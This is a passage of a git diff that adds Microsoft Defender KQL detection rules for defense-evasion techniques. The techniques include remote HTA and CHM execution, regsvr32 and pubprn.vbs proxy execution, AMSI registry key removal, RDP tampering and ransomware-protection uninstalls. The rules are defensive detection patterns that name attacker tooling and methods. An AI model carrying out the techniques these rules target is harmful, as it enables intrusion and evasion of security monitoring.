"68F9B52895F4D34E74112F3129B3B00D" or MD5 startswith "B365AF317AE730A67C936F21432B9C71") or (SHA1 startswith "A0BDFAC3CE1880B32FF9B696458327CE352E3B1D" or SHA1 startswith "C5E2018BF7C0F314FED4FD7FE7E69FA2E648359E") or (SHA256 startswith "D4A0FE56316A2C45B9BA9AC1005363309A3EDC7ACF9E4DF64D326A0FF273E80F" or SHA256 startswith "BD2C2CF0631D881ED382817AFCCE2B093F4E412FFB170A719E2762F250ABFEA4")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/publisher_attachment_file_dropped_in_suspicious_location.kql b/KQL/rules/Defense Evasion/publisher_attachment_file_dropped_in_suspicious_location.kql new file mode 100644 index 00000000..c694610a --- /dev/null +++ b/KQL/rules/Defense Evasion/publisher_attachment_file_dropped_in_suspicious_location.kql @@ -0,0 +1,12 @@ +// Title: Publisher Attachment File Dropped In Suspicious Location +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-02-08 +// Level: medium +// Description: Detects creation of files with the ".pub" extension in suspicious or uncommon locations. This could be a sign of attackers abusing Publisher documents +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion +// False Positives: +// - Legitimate usage of ".pub" files from those locations + +DeviceFileEvents +| where (FolderPath contains "\\AppData\\Local\\Temp\\" or FolderPath contains "\\Users\\Public\\" or FolderPath contains "\\Windows\\Temp\\" or FolderPath contains "C:\\Temp\\") and FolderPath endswith ".pub" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/pubprn_vbs_proxy_execution.kql b/KQL/rules/Defense Evasion/pubprn_vbs_proxy_execution.kql new file mode 100644 index 00000000..f5e7ba81 --- /dev/null +++ b/KQL/rules/Defense Evasion/pubprn_vbs_proxy_execution.kql @@ -0,0 +1,10 @@ +// Title: Pubprn.vbs Proxy Execution +// Author: frack113 +// Date: 2022-05-28 +// Level: medium +// Description: Detects the use of the 'Pubprn.vbs' Microsoft signed script to execute commands. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1216.001 + +DeviceProcessEvents +| where ProcessCommandLine contains "\\pubprn.vbs" and ProcessCommandLine contains "script:" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/python_function_execution_security_warning_disabled_in_excel.kql b/KQL/rules/Defense Evasion/python_function_execution_security_warning_disabled_in_excel.kql new file mode 100644 index 00000000..6ed4cedb --- /dev/null +++ b/KQL/rules/Defense Evasion/python_function_execution_security_warning_disabled_in_excel.kql @@ -0,0 +1,12 @@ +// Title: Python Function Execution Security Warning Disabled In Excel +// Author: @Kostastsale +// Date: 2023-08-22 +// Level: high +// Description: Detects changes to the registry value "PythonFunctionWarnings" that would prevent any warnings or alerts from showing when Python functions are about to be executed. +Threat actors could run malicious code through the new Microsoft Excel feature that allows Python to run within the spreadsheet. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 + +DeviceProcessEvents +| where ProcessCommandLine contains " 0" and (ProcessCommandLine contains "\\Microsoft\\Office\\" and ProcessCommandLine contains "\\Excel\\Security" and ProcessCommandLine contains "PythonFunctionWarnings") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/python_function_execution_security_warning_disabled_in_excel_registry.kql b/KQL/rules/Defense Evasion/python_function_execution_security_warning_disabled_in_excel_registry.kql new file mode 100644 index 00000000..4c02c568 --- /dev/null +++ b/KQL/rules/Defense Evasion/python_function_execution_security_warning_disabled_in_excel_registry.kql @@ -0,0 +1,12 @@ +// Title: Python Function Execution Security Warning Disabled In Excel - Registry +// Author: Nasreddine Bencherchali (Nextron Systems), @Kostastsale +// Date: 2024-08-23 +// Level: high +// Description: Detects changes to the registry value "PythonFunctionWarnings" that would prevent any warnings or alerts from showing when Python functions are about to be executed. +Threat actors could run malicious code through the new Microsoft Excel feature that allows Python to run within the spreadsheet. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 + +DeviceRegistryEvents +| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\Microsoft\\Office*" and RegistryKey endswith "\\Excel\\Security\\PythonFunctionWarnings" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/python_image_load_by_non_python_process.kql b/KQL/rules/Defense Evasion/python_image_load_by_non_python_process.kql new file mode 100644 index 00000000..7a42b235 --- /dev/null +++ b/KQL/rules/Defense Evasion/python_image_load_by_non_python_process.kql @@ -0,0 +1,17 @@ +// Title: Python Image Load By Non-Python Process +// Author: Patrick St. John, OTR (Open Threat Research) +// Date: 2020-05-03 +// Level: low +// Description: Detects the image load of "Python Core" by a non-Python process. This might be indicative of a execution of executable that has been bundled from Python code. +Various tools like Py2Exe, PyInstaller, and cx_Freeze are used to bundle Python code into standalone executables. +Threat actors often use these tools to bundle malicious Python scripts into executables, sometimes to obfuscate the code or to bypass security measures. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1027.002 +// False Positives: +// - Legitimate Py2Exe Binaries +// - Known false positive caused with Python Anaconda +// - Various legitimate software is bundled from Python code into executables + +DeviceImageLoadEvents +| where InitiatingProcessVersionInfoFileDescription =~ "Python Core" and (not((InitiatingProcessFolderPath contains "Python" or (InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\ProgramData\\Anaconda3\\")))) and (not(isnull(InitiatingProcessFolderPath))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/raccine_uninstall.kql b/KQL/rules/Defense Evasion/raccine_uninstall.kql new file mode 100644 index 00000000..18a375f8 --- /dev/null +++ b/KQL/rules/Defense Evasion/raccine_uninstall.kql @@ -0,0 +1,12 @@ +// Title: Raccine Uninstall +// Author: Florian Roth (Nextron Systems) +// Date: 2021-01-21 +// Level: high +// Description: Detects commands that indicate a Raccine removal from an end system. Raccine is a free ransomware protection tool. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Legitimate deinstallation by administrative staff + +DeviceProcessEvents +| where (ProcessCommandLine contains "taskkill " and ProcessCommandLine contains "RaccineSettings.exe") or (ProcessCommandLine contains "reg.exe" and ProcessCommandLine contains "delete" and ProcessCommandLine contains "Raccine Tray") or (ProcessCommandLine contains "schtasks" and ProcessCommandLine contains "/DELETE" and ProcessCommandLine contains "Raccine Rules Updater") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/rdp_connection_allowed_via_netsh_exe.kql b/KQL/rules/Defense Evasion/rdp_connection_allowed_via_netsh_exe.kql new file mode 100644 index 00000000..bc506662 --- /dev/null +++ b/KQL/rules/Defense Evasion/rdp_connection_allowed_via_netsh_exe.kql @@ -0,0 +1,12 @@ +// Title: RDP Connection Allowed Via Netsh.EXE +// Author: Sander Wiebing +// Date: 2020-05-23 +// Level: high +// Description: Detects usage of the netsh command to open and allow connections to port 3389 (RDP). As seen used by Sarwent Malware +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.004 +// False Positives: +// - Legitimate administration activity + +DeviceProcessEvents +| where ((ProcessCommandLine contains "portopening" or ProcessCommandLine contains "allow") and (ProcessCommandLine contains "firewall " and ProcessCommandLine contains "add " and ProcessCommandLine contains "tcp " and ProcessCommandLine contains "3389")) and (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/rdp_sensitive_settings_changed.kql b/KQL/rules/Defense Evasion/rdp_sensitive_settings_changed.kql new file mode 100644 index 00000000..c11f7694 --- /dev/null +++ b/KQL/rules/Defense Evasion/rdp_sensitive_settings_changed.kql @@ -0,0 +1,14 @@ +// Title: RDP Sensitive Settings Changed +// Author: Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali +// Date: 2022-08-06 +// Level: high +// Description: Detects tampering of RDP Terminal Service/Server sensitive settings. +Such as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections'...etc + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.persistence, attack.t1112 +// False Positives: +// - Some of the keys mentioned here could be modified by an administrator while setting group policy (it should be investigated either way) + +DeviceRegistryEvents +| where ((RegistryValueData in~ ("DWORD (0x00000001)", "DWORD (0x00000002)", "DWORD (0x00000003)", "DWORD (0x00000004)")) and (RegistryKey endswith "\\Control\\Terminal Server*" or RegistryKey endswith "\\Windows NT\\Terminal Services*") and RegistryKey endswith "\\Shadow") or (RegistryValueData =~ "DWORD (0x00000001)" and (RegistryKey endswith "\\Control\\Terminal Server*" or RegistryKey endswith "\\Windows NT\\Terminal Services*") and (RegistryKey endswith "\\DisableRemoteDesktopAntiAlias" or RegistryKey endswith "\\DisableSecuritySettings" or RegistryKey endswith "\\fAllowUnsolicited" or RegistryKey endswith "\\fAllowUnsolicitedFullControl")) or (RegistryKey contains "\\Control\\Terminal Server\\InitialProgram" or RegistryKey contains "\\Control\\Terminal Server\\WinStations\\RDP-Tcp\\InitialProgram" or RegistryKey contains "\\services\\TermService\\Parameters\\ServiceDll" or RegistryKey contains "\\Windows NT\\Terminal Services\\InitialProgram") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/rdp_sensitive_settings_changed_to_zero.kql b/KQL/rules/Defense Evasion/rdp_sensitive_settings_changed_to_zero.kql new file mode 100644 index 00000000..a6cde613 --- /dev/null +++ b/KQL/rules/Defense Evasion/rdp_sensitive_settings_changed_to_zero.kql @@ -0,0 +1,14 @@ +// Title: RDP Sensitive Settings Changed to Zero +// Author: Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali +// Date: 2022-09-29 +// Level: medium +// Description: Detects tampering of RDP Terminal Service/Server sensitive settings. +Such as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections', etc. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.persistence, attack.t1112 +// False Positives: +// - Some of the keys mentioned here could be modified by an administrator while setting group policy (it should be investigated either way) + +DeviceRegistryEvents +| where RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey endswith "\\fDenyTSConnections" or RegistryKey endswith "\\fSingleSessionPerUser" or RegistryKey endswith "\\UserAuthentication") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/regasm_exe_execution_without_commandline_flags_or_files.kql b/KQL/rules/Defense Evasion/regasm_exe_execution_without_commandline_flags_or_files.kql new file mode 100644 index 00000000..e7d6a322 --- /dev/null +++ b/KQL/rules/Defense Evasion/regasm_exe_execution_without_commandline_flags_or_files.kql @@ -0,0 +1,14 @@ +// Title: RegAsm.EXE Execution Without CommandLine Flags or Files +// Author: frack113 +// Date: 2025-06-04 +// Level: low +// Description: Detects the execution of "RegAsm.exe" without a commandline flag or file, which might indicate potential process injection activity. +Usually "RegAsm.exe" should point to a dedicated DLL file or call the help with the "/?" flag. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.009 +// False Positives: +// - Legitimate use of Regasm by developers. + +DeviceProcessEvents +| where (ProcessCommandLine endswith "RegAsm" or ProcessCommandLine endswith "RegAsm.exe" or ProcessCommandLine endswith "RegAsm.exe\"" or ProcessCommandLine endswith "RegAsm.exe'") and (FolderPath endswith "\\RegAsm.exe" or ProcessVersionInfoOriginalFileName =~ "RegAsm.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/regasm_exe_initiating_network_connection_to_public_ip.kql b/KQL/rules/Defense Evasion/regasm_exe_initiating_network_connection_to_public_ip.kql new file mode 100644 index 00000000..67a400a8 --- /dev/null +++ b/KQL/rules/Defense Evasion/regasm_exe_initiating_network_connection_to_public_ip.kql @@ -0,0 +1,10 @@ +// Title: RegAsm.EXE Initiating Network Connection To Public IP +// Author: frack113 +// Date: 2024-04-25 +// Level: medium +// Description: Detects "RegAsm.exe" initiating a network connection to public IP adresses +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.009 + +DeviceNetworkEvents +| where InitiatingProcessFolderPath endswith "\\regasm.exe" and (not((ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7")))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/regedit_as_trusted_installer.kql b/KQL/rules/Defense Evasion/regedit_as_trusted_installer.kql new file mode 100644 index 00000000..921895a9 --- /dev/null +++ b/KQL/rules/Defense Evasion/regedit_as_trusted_installer.kql @@ -0,0 +1,12 @@ +// Title: Regedit as Trusted Installer +// Author: Florian Roth (Nextron Systems) +// Date: 2021-05-27 +// Level: high +// Description: Detects a regedit started with TrustedInstaller privileges or by ProcessHacker.exe +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where FolderPath endswith "\\regedit.exe" and (InitiatingProcessFolderPath endswith "\\TrustedInstaller.exe" or InitiatingProcessFolderPath endswith "\\ProcessHacker.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/register_app_vbs_proxy_execution.kql b/KQL/rules/Defense Evasion/register_app_vbs_proxy_execution.kql new file mode 100644 index 00000000..5721ff3d --- /dev/null +++ b/KQL/rules/Defense Evasion/register_app_vbs_proxy_execution.kql @@ -0,0 +1,12 @@ +// Title: REGISTER_APP.VBS Proxy Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-19 +// Level: medium +// Description: Detects the use of a Microsoft signed script 'REGISTER_APP.VBS' to register a VSS/VDS Provider as a COM+ application. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 +// False Positives: +// - Legitimate usage of the script. Always investigate what's being registered to confirm if it's benign + +DeviceProcessEvents +| where ProcessCommandLine contains "\\register_app.vbs" and ProcessCommandLine contains "-register" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/registry_entries_for_azorult_malware.kql b/KQL/rules/Defense Evasion/registry_entries_for_azorult_malware.kql new file mode 100644 index 00000000..5af6576b --- /dev/null +++ b/KQL/rules/Defense Evasion/registry_entries_for_azorult_malware.kql @@ -0,0 +1,10 @@ +// Title: Registry Entries For Azorult Malware +// Author: Trent Liffick +// Date: 2020-05-08 +// Level: critical +// Description: Detects the presence of a registry key created during Azorult execution +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.persistence, attack.execution, attack.t1112 + +DeviceRegistryEvents +| where RegistryKey endswith "SYSTEM*" and RegistryKey endswith "\\services\\localNETService" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/registry_persistence_via_service_in_safe_mode.kql b/KQL/rules/Defense Evasion/registry_persistence_via_service_in_safe_mode.kql new file mode 100644 index 00000000..01f3e1d6 --- /dev/null +++ b/KQL/rules/Defense Evasion/registry_persistence_via_service_in_safe_mode.kql @@ -0,0 +1,10 @@ +// Title: Registry Persistence via Service in Safe Mode +// Author: frack113 +// Date: 2022-04-04 +// Level: high +// Description: Detects the modification of the registry to allow a driver or service to persist in Safe Mode. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1564.001 + +DeviceRegistryEvents +| where (RegistryValueData =~ "Service" and (RegistryKey endswith "\\Control\\SafeBoot\\Minimal*" or RegistryKey endswith "\\Control\\SafeBoot\\Network*") and RegistryKey endswith "\\(Default)") and (not(((RegistryValueData =~ "Service" and InitiatingProcessFolderPath =~ "C:\\Hexnode\\Hexnode Agent\\Current\\HexnodeAgent.exe" and (RegistryKey endswith "\\Control\\SafeBoot\\Minimal\\Hexnode Updater\\(Default)" or RegistryKey endswith "\\Control\\SafeBoot\\Network\\Hexnode Updater\\(Default)" or RegistryKey endswith "\\Control\\SafeBoot\\Minimal\\Hexnode Agent\\(Default)" or RegistryKey endswith "\\Control\\SafeBoot\\Network\\Hexnode Agent\\(Default)")) or (RegistryValueData =~ "Service" and InitiatingProcessFolderPath endswith "\\MBAMInstallerService.exe" and RegistryKey endswith "\\MBAMService\\(Default)") or (InitiatingProcessFolderPath =~ "C:\\WINDOWS\\system32\\msiexec.exe" and (RegistryKey endswith "\\Control\\SafeBoot\\Minimal\\SAVService\\(Default)" or RegistryKey endswith "\\Control\\SafeBoot\\Network\\SAVService\\(Default)"))))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/regsvr32_dll_execution_with_suspicious_file_extension.kql b/KQL/rules/Defense Evasion/regsvr32_dll_execution_with_suspicious_file_extension.kql new file mode 100644 index 00000000..322e2104 --- /dev/null +++ b/KQL/rules/Defense Evasion/regsvr32_dll_execution_with_suspicious_file_extension.kql @@ -0,0 +1,12 @@ +// Title: Regsvr32 DLL Execution With Suspicious File Extension +// Author: Florian Roth (Nextron Systems), frack113 +// Date: 2021-11-29 +// Level: high +// Description: Detects the execution of REGSVR32.exe with DLL files masquerading as other files +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.010 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (ProcessCommandLine endswith ".bin" or ProcessCommandLine endswith ".bmp" or ProcessCommandLine endswith ".cr2" or ProcessCommandLine endswith ".dat" or ProcessCommandLine endswith ".eps" or ProcessCommandLine endswith ".gif" or ProcessCommandLine endswith ".ico" or ProcessCommandLine endswith ".jpeg" or ProcessCommandLine endswith ".jpg" or ProcessCommandLine endswith ".log" or ProcessCommandLine endswith ".nef" or ProcessCommandLine endswith ".orf" or ProcessCommandLine endswith ".png" or ProcessCommandLine endswith ".raw" or ProcessCommandLine endswith ".rtf" or ProcessCommandLine endswith ".sr2" or ProcessCommandLine endswith ".temp" or ProcessCommandLine endswith ".tif" or ProcessCommandLine endswith ".tiff" or ProcessCommandLine endswith ".tmp" or ProcessCommandLine endswith ".txt") and (FolderPath endswith "\\regsvr32.exe" or ProcessVersionInfoOriginalFileName =~ "REGSVR32.EXE") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/regsvr32_execution_from_highly_suspicious_location.kql b/KQL/rules/Defense Evasion/regsvr32_execution_from_highly_suspicious_location.kql new file mode 100644 index 00000000..f2e6928a --- /dev/null +++ b/KQL/rules/Defense Evasion/regsvr32_execution_from_highly_suspicious_location.kql @@ -0,0 +1,12 @@ +// Title: Regsvr32 Execution From Highly Suspicious Location +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-26 +// Level: high +// Description: Detects execution of regsvr32 where the DLL is located in a highly suspicious locations +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.010 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (FolderPath endswith "\\regsvr32.exe" or ProcessVersionInfoOriginalFileName =~ "REGSVR32.EXE") and ((ProcessCommandLine contains ":\\PerfLogs\\" or ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains "\\Windows\\Registration\\CRMLog" or ProcessCommandLine contains "\\Windows\\System32\\com\\dmp\\" or ProcessCommandLine contains "\\Windows\\System32\\FxsTmp\\" or ProcessCommandLine contains "\\Windows\\System32\\Microsoft\\Crypto\\RSA\\MachineKeys\\" or ProcessCommandLine contains "\\Windows\\System32\\spool\\drivers\\color\\" or ProcessCommandLine contains "\\Windows\\System32\\spool\\PRINTERS\\" or ProcessCommandLine contains "\\Windows\\System32\\spool\\SERVERS\\" or ProcessCommandLine contains "\\Windows\\System32\\Tasks_Migrated\\" or ProcessCommandLine contains "\\Windows\\System32\\Tasks\\Microsoft\\Windows\\SyncCenter\\" or ProcessCommandLine contains "\\Windows\\SysWOW64\\com\\dmp\\" or ProcessCommandLine contains "\\Windows\\SysWOW64\\FxsTmp\\" or ProcessCommandLine contains "\\Windows\\SysWOW64\\Tasks\\Microsoft\\Windows\\PLA\\System\\" or ProcessCommandLine contains "\\Windows\\SysWOW64\\Tasks\\Microsoft\\Windows\\SyncCenter\\" or ProcessCommandLine contains "\\Windows\\Tasks\\" or ProcessCommandLine contains "\\Windows\\Tracing\\") or ((ProcessCommandLine contains " \"C:\\" or ProcessCommandLine contains " C:\\" or ProcessCommandLine contains " 'C:\\" or ProcessCommandLine contains "D:\\") and (not((ProcessCommandLine contains "C:\\Program Files (x86)\\" or ProcessCommandLine contains "C:\\Program Files\\" or ProcessCommandLine contains "C:\\ProgramData\\" or ProcessCommandLine contains "C:\\Users\\" or ProcessCommandLine contains " C:\\Windows\\" or ProcessCommandLine contains " \"C:\\Windows\\" or ProcessCommandLine contains " 'C:\\Windows\\"))))) and (not((ProcessCommandLine =~ "" or isnull(ProcessCommandLine)))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/regsvr32_execution_from_potential_suspicious_location.kql b/KQL/rules/Defense Evasion/regsvr32_execution_from_potential_suspicious_location.kql new file mode 100644 index 00000000..c0686fd3 --- /dev/null +++ b/KQL/rules/Defense Evasion/regsvr32_execution_from_potential_suspicious_location.kql @@ -0,0 +1,12 @@ +// Title: Regsvr32 Execution From Potential Suspicious Location +// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-26 +// Level: medium +// Description: Detects execution of regsvr32 where the DLL is located in a potentially suspicious location. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.010 +// False Positives: +// - Some installers might execute "regsvr32" with DLLs located in %TEMP% or in %PROGRAMDATA%. Apply additional filters if necessary. + +DeviceProcessEvents +| where (ProcessCommandLine contains ":\\ProgramData\\" or ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\AppData\\Roaming\\") and (FolderPath endswith "\\regsvr32.exe" or ProcessVersionInfoOriginalFileName =~ "REGSVR32.EXE") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/remote_access_tool_rurat_execution_from_unusual_location.kql b/KQL/rules/Defense Evasion/remote_access_tool_rurat_execution_from_unusual_location.kql new file mode 100644 index 00000000..1c403f04 --- /dev/null +++ b/KQL/rules/Defense Evasion/remote_access_tool_rurat_execution_from_unusual_location.kql @@ -0,0 +1,10 @@ +// Title: Remote Access Tool - RURAT Execution From Unusual Location +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-09-19 +// Level: medium +// Description: Detects execution of Remote Utilities RAT (RURAT) from an unusual location (outside of 'C:\Program Files') +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion + +DeviceProcessEvents +| where ((FolderPath endswith "\\rutserv.exe" or FolderPath endswith "\\rfusclient.exe") or ProcessVersionInfoProductName =~ "Remote Utilities") and (not((FolderPath startswith "C:\\Program Files\\Remote Utilities" or FolderPath startswith "C:\\Program Files (x86)\\Remote Utilities"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/remote_chm_file_download_execution_via_hh_exe.kql b/KQL/rules/Defense Evasion/remote_chm_file_download_execution_via_hh_exe.kql new file mode 100644 index 00000000..313674f4 --- /dev/null +++ b/KQL/rules/Defense Evasion/remote_chm_file_download_execution_via_hh_exe.kql @@ -0,0 +1,10 @@ +// Title: Remote CHM File Download/Execution Via HH.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-09-29 +// Level: high +// Description: Detects the usage of "hh.exe" to execute/download remotely hosted ".chm" files. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.001 + +DeviceProcessEvents +| where (ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://" or ProcessCommandLine contains "\\\\") and (ProcessVersionInfoOriginalFileName =~ "HH.exe" or FolderPath endswith "\\hh.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/remote_code_execute_via_winrm_vbs.kql b/KQL/rules/Defense Evasion/remote_code_execute_via_winrm_vbs.kql new file mode 100644 index 00000000..77b5df98 --- /dev/null +++ b/KQL/rules/Defense Evasion/remote_code_execute_via_winrm_vbs.kql @@ -0,0 +1,10 @@ +// Title: Remote Code Execute via Winrm.vbs +// Author: Julia Fomina, oscd.community +// Date: 2020-10-07 +// Level: medium +// Description: Detects an attempt to execute code or create service on remote host via winrm.vbs. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1216 + +DeviceProcessEvents +| where (ProcessCommandLine contains "winrm" and ProcessCommandLine contains "invoke Create wmicimv2/Win32_" and ProcessCommandLine contains "-r:http") and (FolderPath endswith "\\cscript.exe" or ProcessVersionInfoOriginalFileName =~ "cscript.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/remote_file_download_via_findstr_exe.kql b/KQL/rules/Defense Evasion/remote_file_download_via_findstr_exe.kql new file mode 100644 index 00000000..ec27779c --- /dev/null +++ b/KQL/rules/Defense Evasion/remote_file_download_via_findstr_exe.kql @@ -0,0 +1,11 @@ +// Title: Remote File Download Via Findstr.EXE +// Author: Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative, Nasreddine Bencherchali (Nextron Systems) +// Date: 2020-10-05 +// Level: medium +// Description: Detects execution of "findstr" with specific flags and a remote share path. This specific set of CLI flags would allow "findstr" to download the content of the file located on the remote share as described in the LOLBAS entry. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.credential-access, attack.command-and-control, attack.t1218, attack.t1564.004, attack.t1552.001, attack.t1105 + +DeviceProcessEvents +| where (ProcessCommandLine contains "findstr" or FolderPath endswith "findstr.exe" or ProcessVersionInfoOriginalFileName =~ "FINDSTR.EXE") and ((ProcessCommandLine contains " -v " or ProcessCommandLine contains " /v " or ProcessCommandLine contains " –v " or ProcessCommandLine contains " —v " or ProcessCommandLine contains " ―v ") and (ProcessCommandLine contains " -l " or ProcessCommandLine contains " /l " or ProcessCommandLine contains " –l " or ProcessCommandLine contains " —l " or ProcessCommandLine contains " ―l ") and ProcessCommandLine contains "\\\\") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/remote_xsl_execution_via_msxsl_exe.kql b/KQL/rules/Defense Evasion/remote_xsl_execution_via_msxsl_exe.kql new file mode 100644 index 00000000..ddeb538c --- /dev/null +++ b/KQL/rules/Defense Evasion/remote_xsl_execution_via_msxsl_exe.kql @@ -0,0 +1,12 @@ +// Title: Remote XSL Execution Via Msxsl.EXE +// Author: Swachchhanda Shrawan Poudel +// Date: 2023-11-09 +// Level: high +// Description: Detects the execution of the "msxsl" binary with an "http" keyword in the command line. This might indicate a potential remote execution of XSL files. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1220 +// False Positives: +// - Msxsl is not installed by default and is deprecated, so unlikely on most systems. + +DeviceProcessEvents +| where ProcessCommandLine contains "http" and FolderPath endswith "\\msxsl.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/remotefxvgpudisablement_abuse_via_atomictestharnesses.kql b/KQL/rules/Defense Evasion/remotefxvgpudisablement_abuse_via_atomictestharnesses.kql new file mode 100644 index 00000000..dfee6a59 --- /dev/null +++ b/KQL/rules/Defense Evasion/remotefxvgpudisablement_abuse_via_atomictestharnesses.kql @@ -0,0 +1,10 @@ +// Title: RemoteFXvGPUDisablement Abuse Via AtomicTestHarnesses +// Author: frack113 +// Date: 2021-07-13 +// Level: high +// Description: Detects calls to the AtomicTestHarnesses "Invoke-ATHRemoteFXvGPUDisablementCommand" which is designed to abuse the "RemoteFXvGPUDisablement.exe" binary to run custom PowerShell code via module load-order hijacking. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 + +DeviceProcessEvents +| where ProcessCommandLine contains "Invoke-ATHRemoteFXvGPUDisablementCommand" or ProcessCommandLine contains "Invoke-ATHRemoteFXvGPUDisableme" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/remotely_hosted_hta_file_executed_via_mshta_exe.kql b/KQL/rules/Defense Evasion/remotely_hosted_hta_file_executed_via_mshta_exe.kql new file mode 100644 index 00000000..e0719599 --- /dev/null +++ b/KQL/rules/Defense Evasion/remotely_hosted_hta_file_executed_via_mshta_exe.kql @@ -0,0 +1,10 @@ +// Title: Remotely Hosted HTA File Executed Via Mshta.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-08 +// Level: high +// Description: Detects execution of the "mshta" utility with an argument containing the "http" keyword, which could indicate that an attacker is executing a remotely hosted malicious hta file +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.t1218.005 + +DeviceProcessEvents +| where (ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://" or ProcessCommandLine contains "ftp://") and (FolderPath endswith "\\mshta.exe" or ProcessVersionInfoOriginalFileName =~ "MSHTA.EXE") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/removal_of_amsi_provider_registry_keys.kql b/KQL/rules/Defense Evasion/removal_of_amsi_provider_registry_keys.kql new file mode 100644 index 00000000..ee4a4e4b --- /dev/null +++ b/KQL/rules/Defense Evasion/removal_of_amsi_provider_registry_keys.kql @@ -0,0 +1,12 @@ +// Title: Removal Of AMSI Provider Registry Keys +// Author: frack113 +// Date: 2021-06-07 +// Level: high +// Description: Detects the deletion of AMSI provider registry key entries in HKLM\Software\Microsoft\AMSI. This technique could be used by an attacker in order to disable AMSI inspection. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Unlikely + +DeviceRegistryEvents +| where 